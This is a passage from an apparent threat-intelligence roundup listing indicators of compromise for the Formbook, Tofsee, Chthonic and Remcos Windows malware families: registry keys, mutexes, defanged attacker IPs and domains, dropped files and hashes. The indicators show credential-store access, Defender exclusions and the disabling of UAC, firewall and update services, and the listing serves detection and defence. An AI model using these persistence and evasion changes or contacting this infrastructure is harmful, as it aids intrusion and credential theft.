AMP\n\n[](<https://1.bp.blogspot.com/-ZHnATHYXbBo/XU3PsCQ8GnI/AAAAAAAACTw/C0tZjMLq7zQu-pw45c3wuZxIa_DJJlf-QCEwYBhgL/s1600/7e9b3d25d766a1ff8520187b8f49387b1f654778ba58838e37e0ff741ab10f73_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-U_ICUIL9cmQ/XU3P66OFj2I/AAAAAAAACT0/h7jOKg0cCk0X2MbaEILOX8wF4sD5VafcQCEwYBhgL/s1600/7e9b3d25d766a1ff8520187b8f49387b1f654778ba58838e37e0ff741ab10f73_tg.png>)\n\n \n\n\n \n\n\n### Win.Malware.Formbook-7102043-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: Registry Key Name ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\INTELLIFORMS\\STORAGE2 ` | 8 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MOZILLA\\MOZILLA FIREFOX ` | 8 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MOZILLA\\MOZILLA FIREFOX\\20.0.1 (EN-US)\\MAIN ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\9375CFF0413111D3B88A00104B2A6676 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\9375CFF0413111D3B88A00104B2A6676\\00000001 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\9375CFF0413111D3B88A00104B2A6676\\00000002 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\9375CFF0413111D3B88A00104B2A6676\\00000003 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\0A0D020000000000C000000000000046 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\13DBB0C8AA05101A9BB000AA002FC45A ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\33FD244257221B4AA4A1D9E6CACF8474 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\3517490D76624C419A828607E2A54604 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\4C8F4917D8AB2943A2B2D4227B0585BF ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\5309EDC19DC6C14CBAD5BA06BDBDABD9 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\82FA2A40D311B5469A626349C16CE09B ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\8503020000000000C000000000000046 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\9207F3E0A3B11019908B08002B2A56C2 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\9E71065376EE7F459F30EA2534981B83 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\A88F7DCF2E30234E8288283D75A65EFB ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\C02EBC5353D9CD11975200AA004AE40E ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\D33FC3B19A738142B2FC0C56BD56AD8C ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\DDB0922FC50B8D42BE5A821EDE840761 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\DF18513432D1694F96E6423201804111 ` | 8 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS MESSAGING SUBSYSTEM\\PROFILES\\OUTLOOK\\ECD15244C3E90A4FBD0588A41AB27C55 ` | 8 \nMutexes | Occurrences \n---|--- \n`8-3503835SZBFHHZ` | 11 \n`551NC37UWE1041Fz` | 11 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`213[.]171[.]195[.]105` | 2 \n`213[.]186[.]33[.]5` | 1 \n`74[.]220[.]215[.]74` | 1 \n`154[.]91[.]238[.]82` | 1 \n`208[.]91[.]197[.]39` | 1 \n`47[.]91[.]169[.]15` | 1 \n`103[.]251[.]238[.]111` | 1 \n`185[.]218[.]125[.]67` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]aamyz87[.]info` | 3 \n`www[.]ingenuity[.]degree` | 2 \n`www[.]activeliberal[.]win` | 2 \n`www[.]beautagram[.]com` | 2 \n`gmpg[.]org` | 1 \n`www[.]cyqunli[.]com` | 1 \n`WWW[.]SOJAH[.]STORE` | 1 \n`www[.]qhdljj[.]com` | 1 \n`www[.]tzhmc[.]net` | 1 \n`www[.]yourbostonrefinance[.]com` | 1 \n`www[.]immersive-journey[.]com` | 1 \n`www[.]studiodennis[.]com` | 1 \n`www[.]wanggh[.]com` | 1 \n`www[.]americatourbus[.]info` | 1 \n`www[.]kalayab[.]download` | 1 \n`www[.]shaoerjia[.]com` | 1 \n`www[.]maybrooktaxiandlimo[.]info` | 1 \n`www[.]tipshots[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\subfolder` | 11 \n`%TEMP%\\subfolder\\filename.exe` | 11 \n`%TEMP%\\subfolder\\filename.vbs` | 11 \n`%APPDATA%\\551NC37U` | 8 \n`%APPDATA%\\551NC37U\\551log.ini` | 8 \n`%APPDATA%\\551NC37U\\551logrc.ini` | 8 \n`%APPDATA%\\551NC37U\\551logri.ini` | 8 \n`%APPDATA%\\551NC37U\\551logrv.ini` | 8 \n`%APPDATA%\\551NC37U\\551logim.jpeg` | 7 \n`%ProgramFiles(x86)%\\Amb80q` | 1 \n`%ProgramFiles(x86)%\\Amb80q\\serviceslds.exe` | 1 \n`%TEMP%\\Amb80q` | 1 \n`%TEMP%\\Amb80q\\serviceslds.exe` | 1 \n \n#### File Hashes\n\n` 0d9c018014931c251ac8bf951a99fcb974673e895f27e62fa6ead981b2d7b4a2 152f38878f5a8b19fef76f086f60f9a350bacfb55ced80cdbceb200b88e9c9fa 2908ff55a23aa61c2393df98cd6847f60343f296aeeb7bcc60c510701dcbf84f 2b6f4aad989ddca53c3cb56bbddb52e8577cbb40939f97ef9c7efb60d24a39ae 2c82db5284c54272e4ba7ac3523ffccf496d1584fd99444c0eaa225773e29721 6fc83ce9acf100506d039461642290e798f46baaf8034b5f2ead098edc3d9f4c 78663a1055ddd96e74b633b43128c83378787b52f031194ebaeccf69a0222645 c1b420d09459d96aa0bbc12a6b010a6d12b5910ffbd0289fa7a3ed3aebfac40d d27385d640966750e4ead578539a36a62ba0ae5c9083f03865927ef5deac2d8f d7bb858da997925668b1f85b83ba9f01b381a16de1ee6c37d003658cb98c4990 e4baf530d129b0a3a87e5de09ce86efc7c6c532ec91ade78c934d5e8d818938e `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-T4Xc5XxJ2PY/XU3QmQJpPJI/AAAAAAAACT8/33Yc9frC4pwvaz88aJ6B3XoWNWbA4AqUwCLcBGAs/s1600/2c82db5284c54272e4ba7ac3523ffccf496d1584fd99444c0eaa225773e29721_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-IAWh8SPAAL4/XU3Qp2jP04I/AAAAAAAACUA/Cib5bh0DuU4Nu1e3kJm418FBFHAyrPSogCLcBGAs/s1600/2c82db5284c54272e4ba7ac3523ffccf496d1584fd99444c0eaa225773e29721_tg.png>)\n\n \n\n\n \n\n\n### Win.Malware.Tofsee-7101989-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 15 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 15 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 15 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 15 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 12 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config4 ` | 4 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\wpdjiqwl ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\xqekjrxm ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\qjxdckqf ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\unbhgouj ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\ibpvucix ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\athnmuap ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\tmagfnti ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\piwcbjpe ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\slzfemsh ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\mftzygmb ` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`239[.]255[.]255[.]250` | 15 \n`69[.]55[.]5[.]250` | 15 \n`46[.]4[.]52[.]109` | 15 \n`176[.]111[.]49[.]43` | 15 \n`85[.]25[.]119[.]25` | 15 \n`144[.]76[.]199[.]2` | 15 \n`144[.]76[.]199[.]43` | 15 \n`43[.]231[.]4[.]7` | 15 \n`192[.]0[.]47[.]59` | 15 \n`74[.]125[.]192[.]26` | 15 \n`168[.]95[.]5[.]117` | 15 \n`98[.]137[.]159[.]25` | 15 \n`188[.]125[.]73[.]87` | 14 \n`172[.]217[.]12[.]228` | 14 \n`213[.]205[.]33[.]62` | 14 \n`212[.]82[.]101[.]46` | 13 \n`67[.]195[.]228[.]106` | 13 \n`168[.]95[.]6[.]59` | 13 \n`74[.]6[.]137[.]65` | 13 \n`96[.]114[.]157[.]80` | 13 \n`213[.]209[.]1[.]129` | 12 \n`66[.]218[.]85[.]139` | 12 \n`213[.]205[.]33[.]61` | 12 \n`67[.]195[.]228[.]110` | 12 \n`209[.]85[.]202[.]26` | 12 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 15 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 15 \n`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 15 \n`mta5[.]am0[.]yahoodns[.]net` | 15 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 15 \n`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 15 \n`whois[.]iana[.]org` | 15 \n`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 15 \n`whois[.]arin[.]net` | 15 \n`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 15 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 15 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 15 \n`honeypus[.]rusladies[.]cn` | 15 \n`marina99[.]ruladies[.]cn` | 15 \n`eur[.]olc[.]protection[.]outlook[.]com` | 14 \n`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 13 \n`aol[.]com` | 13 \n`msx-smtp-mx1[.]hinet[.]net` | 13 \n`ipinfo[.]io` | 12 \n`smtp-in[.]libero[.]it` | 12 \n`libero[.]it` | 12 \n`tiscali[.]it` | 12 \n`etb-1[.]mail[.]tiscali[.]it` | 12 \n`tiscalinet[.]it` | 12 \n`mx3[.]qq[.]com` | 12 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\config\\systemprofile` | 15 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile:.repos` | 15 \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 15 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 15 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 14 \n`%TEMP%\\ondzgch.exe` | 1 \n`%TEMP%\\rqgcjfk.exe` | 1 \n`%TEMP%\\baqmtpu.exe` | 1 \n`%TEMP%\\qpfbiej.exe` | 1 \n \n#### File Hashes\n\n` 03014df764784dff0d3c56cccdbfb07ca0c04cdbd302403ebedc466e83e18f6c 0c30a1e0c3e91cbaf62beb5e217b44f5065f7e97c19d0eb181e0d37720be178d 213b7ea1e4fee2c08e48c1536b099ab55b0ace638710a8c1920a834ac80648b5 23dc9f05f6003f3730b5731072eb9754fbf80a353cdbe94704a5e425a18aa0e5 31702562438866f49dddb8c0fc8e6d9b68ec2eb73b142c899479102850de0fdd 398288b17c7ffc8b569ac4c8623cb4e1dc4c97da2a021bfd86182fd23e92735c 5a3fe5af1026e7f6217e91cc4b6d1c888efde908369b1b8a216c6e954c648d3d 5d9dc6e667bd105d7e2e77162e87e94b0c5a72be94c1ae726e45ccf4d23753bb 7c73e7cfd0be419b1538309b2a5fb45a2515808fe92492db79e0cbbdce976643 8895dda1641282ea209e8482269cb7c34f2da9843c9d0293fc3d6aec2612e212 8ef82ce7ed1ed7c6ddd446b4a8a7144acac21aab0af0ee82ac764b525ea00b07 b9c035fd6f4d2a6b8d619812b98764885927b80f3a8369e87495f95b2bcbf44d d2f043f4002cdcbd88319a360dc11a0aec1ebae63f37ef9a845beb23779a1151 e42a5b04986cbdc9c13fcb99b2e1e0a2d156e6faaf1369ed71a92220a1347f06 e4c584dd32770439810067fe8607f74a64380fe354725ff4a5d42215b873b1e1 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-QK5Wqh41b5o/XU3Q6hoziYI/AAAAAAAACUI/sMvphMDkpkEaIaw_trTCeaGDfHwtf0F9gCLcBGAs/s1600/5d9dc6e667bd105d7e2e77162e87e94b0c5a72be94c1ae726e45ccf4d23753bb_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-DLX6v1K4KyU/XU3Q_QVOokI/AAAAAAAACUM/ki5QgXGwU54XUE5f6J1yjpyfFCZ0TeTngCLcBGAs/s1600/5d9dc6e667bd105d7e2e77162e87e94b0c5a72be94c1ae726e45ccf4d23753bb_tg.png>)\n\n \n\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-8dV01_lMY_8/XU3RFX7nf-I/AAAAAAAACUQ/xWLg3y2zLOIKtVzwVKAqEr7sKlaOgGbkQCLcBGAs/s1600/213b7ea1e4fee2c08e48c1536b099ab55b0ace638710a8c1920a834ac80648b5_umbrella.png>)\n\n \n\n\n \n\n\n### Win.Malware.Chthonic-7101817-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 24 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: EnableLUA ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Start ` | 24 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Start ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Start ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 24 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 24 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: TaskbarNoNotification ` | 24 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 24 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: HideSCAHealth ` | 24 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \nValue Name: 2827271685 ` | 24 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`20[.]45[.]1[.]107` | 21 \n`40[.]91[.]124[.]111` | 21 \n`192[.]42[.]119[.]41` | 18 \n`40[.]67[.]189[.]14` | 15 \n`20[.]41[.]46[.]145` | 8 \n`192[.]42[.]116[.]41` | 6 \n`40[.]90[.]247[.]210` | 2 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`dnshkjashsdk3d111[.]ru` | 24 \n`www[.]update[.]microsoft[.]com[.]nsatc[.]net` | 21 \nFiles and or directories created | Occurrences \n---|--- \n`\\TEMP\\005F5E~1.EXE` | 1 \n`\\TEMP\\1B106F~1.EXE` | 1 \n`\\TEMP\\0956E4~1.EXE` | 1 \n`\\TEMP\\382BAE~1.EXE` | 1 \n`\\TEMP\\00BA93~1.EXE` | 1 \n`\\TEMP\\12CC7F~1.EXE` | 1 \n \n#### File Hashes\n\n` 005f5e12924dad7fe014a84db45f13429f6ece0b8247f5d352d715b2846c0c4f 00ba939c36fa3b49267f278dc9bb198bc9ae990ce888720048bea52a40cf1c23 0956e4f5453664330032f4d772aba4fc67c67543ca6b5b5970277d3509c0b947 12cc7fd46b6a47ac1c87526633c7a608d31275b31c885f8f47bb994d8ae19e90 17e720effe9bb9123f12df8149180130f8239870cf0d9267f67cf476b6ab44e5 1b106ffffabfe8c46bca9ad44e1fd47a2150a99a701452d4a6d2e51fb968a1af 382baee7e059546686749c2e25e7077db13f724e67629aa253033b53c4aff934 38fa5765572ad2cd028f6aa284d0b780b881d390dd5a8ae32c06d39e7442c026 42c5dd7eebdd5bd210832a6588259e33e737208817c4c1817615b3995c3ac378 4471cabd599d69896184f4e9264f377961488fb4c6cdf41992e0f5b2096c9899 46901064a8beca5f66dd0e9072feab0abb6ec3223b54f6bad81959a306915b47 62828391fca3a6d82749ca15cd2eb5d28153001457df7f1806377235a95603f5 63641d47b507920bd79600352d71655abed663ebe9347ccc5f7841b9dcb95d1b 73b71b837f43a97bfab5c6f541d54b7b090fef3893a0e78b769140a946ba162a 75da2447c69b6b0d78ace3c73e9302688b46cf1bdddac5c61d0c7c8403d39036 7a38d305151c979898e46d7d52dcb8bd4dc67485415a7d122c81facd320bcba8 8be6459aa2282ae9cf52ec766d7c8c55721988ba866339e358d15ae47fbae61f 8c1ab54da3a2372a624d22d902278e048942e9a495b71d330f1eee4073b14eb7 8c495bba75c5ab08e66063bd323525502188899663ad8ac5183baa2a42583bb8 8e3fd8961f232fdbf26019c56901c76db886ed56f86fba8c2f3f0631d33f969e a7316bed0f3820f1ca51eb4c687c763d059d086b610a4250a4051d795b47fd44 acc883924cc2e4b6f5f979a2586e2246a9837faa07702c6a18f90a086d681796 aebb9e807054a61b9125efa05507a9e2cdc6812bd286c007367713d1f377b514 b01cefc142aee229491e1b19a32888b921f1935c4d472807b7d115dc568356e4 b50a5542b24d20aa60a3614699c36f4f75062c7492955b9785fad0df4d0c1525 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-H1zjQzyl6yI/XU3RWxuA7bI/AAAAAAAACUg/sh3k5-9fGvc9qmOHzPATQBhNiRqPi9sGgCLcBGAs/s1600/a7316bed0f3820f1ca51eb4c687c763d059d086b610a4250a4051d795b47fd44_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-rMo2F4NgHYw/XU3RbGvDnjI/AAAAAAAACUk/UMseNSNGYAUgPb-fm091l6WcgTk3wdz5wCLcBGAs/s1600/a7316bed0f3820f1ca51eb4c687c763d059d086b610a4250a4051d795b47fd44_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-BDpwznCi30I/XU3RgVhoJ7I/AAAAAAAACUo/5RxS4nSS59osV7OJ3wsnboj_yF6KpHEaACLcBGAs/s1600/a7316bed0f3820f1ca51eb4c687c763d059d086b610a4250a4051d795b47fd44_umbrella.png>)\n\n \n\n\n### Win.Malware.Remcos-7101023-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\REMCOS-LOPOXR ` | 25 \n`<HKCU>\\SOFTWARE\\REMCOS-LOPOXR \nValue Name: exepath ` | 25 \n`<HKCU>\\SOFTWARE\\REMCOS-LOPOXR \nValue Name: lic ` | 25 \nMutexes | Occurrences \n---|--- \n`Remcos_Mutex_Inj` | 25 \n`Remcos-LOPOXR` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`95[.]140[.]125[.]58` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\Tasks\\Stencilens0.job` | 25 \n`%APPDATA%\\antepenuit.pif` | 25 \n`%System32%\\Tasks\\Stencilens0` | 25 \n \n#### File Hashes\n\n` 081f8d61a3cd912e00e9f53f6a8a3923164cb86205cdaab63abd9b2814ed9777 0a7cfd1b34af81f40d8f05f85bcfa9139bf9ec2eff82fcda1fba409b5a7650f2 0bed354bdcb152cbd012fe1c37d53c8c02da11c11084e8eb83bf577bdd80a464 0d0a83234404e0c08958aafcb6910f6cdfd7dc75d9713bf654c89b99fc341bdc 0d271c5c9ca84e2ab86f6c95d32802e7ec64b846d07b7bf81d0f82409b1b2101 1092677328703cc000e9c63be2b0a2f46103c14f053e9ee079ffd7f0ca2d6f8f 1831367e74cc96e0f72ec11f054525e6c024215bde7b61f110f9b73338ce03cf 1a801a28dfffaea7742f1d467a2c80bb8632b39db214d22abc804f0bc6515cc6 2027c7d8d4403334509ae483d7e0c8be28640a39d4bd9441f87cdc259b92ca4c 2e16d6892291790348a9ebe49ca192925a8db1a7a286c0fbb44c30ba1dff74e2 354c76d9316c5ba1edd6b052f361ec42e925b878915879c1ca903f81b05bfd7b 36c6f434e27087f707a813495e82bdbeac383507ce5a2ca3816e4557a4cddb5e 376746cbbf27f98f9f07676bdb6a5e556fee27b1ae1c388416f17d5e4bc4c62f 392474631d8c58ec089b896569d6e362484865b479c85e2c0906b87349bce68f 3adb3198ca6ac80a842b6aba596fef43eda6aca0f32dbdf59d60133eabde541d 40b75ec8743801bfcbac60c8f0b232971aa61bfb031fe829132a8537c63b9a41 40cf7790bd379a14cecc933b48e6f341164ad872d5ee61136b91092cbfe14aba 49c149ba04e9af98c5da19d305556af3d7cdacf6e2044abfef604b0e5bb38d29 54a0550408c68795a9652e18a4e3820cca6c16246c2e8198497e795dba448644 585061420029af8f635eefe1834874a422d140b8adfbc77d0e789ea9d4ade500 5914996ccdfda579afbd3116cae43d5bd35db5eee27545a60ddef3270af351f1 5a756ce1c997dd1615ea2fc97e5dd3cfcbc29a5f848e5ea6ede37e3d526d4ce3 5e7c49bef106709d6cfc9d85b8d82dc0583f42c1701cb7990e700914db842186 5f9034f63a3cf362b1d2f7baf35a7fadceccd2add363bf7ef3cae4e95a6afb86 5faf5309caaeb3ed3d1b4825b55646c83d769d22c226420bb6418e037cd2f029 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### 